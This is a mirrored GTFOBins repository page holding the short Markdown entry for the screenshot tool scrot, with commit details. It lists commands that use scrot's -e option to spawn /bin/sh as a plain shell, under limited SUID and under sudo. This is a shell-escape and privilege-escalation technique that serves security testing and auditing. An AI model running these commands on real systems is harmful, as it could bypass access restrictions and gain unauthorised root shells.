1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-29 03:31:42 +01:00
GTFOBins.github.io/_gtfobins/scrot.md
Miguel R 887384bc2f
Add scrot
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-07-02 12:52:03 +02:00

11 lines
193 B
Markdown

---
description: This requires a running X server.
functions:
shell:
- code: scrot -e /bin/sh
limited-suid:
- code: ./scrot -e /bin/sh
sudo:
- code: sudo scrot -e /bin/sh
---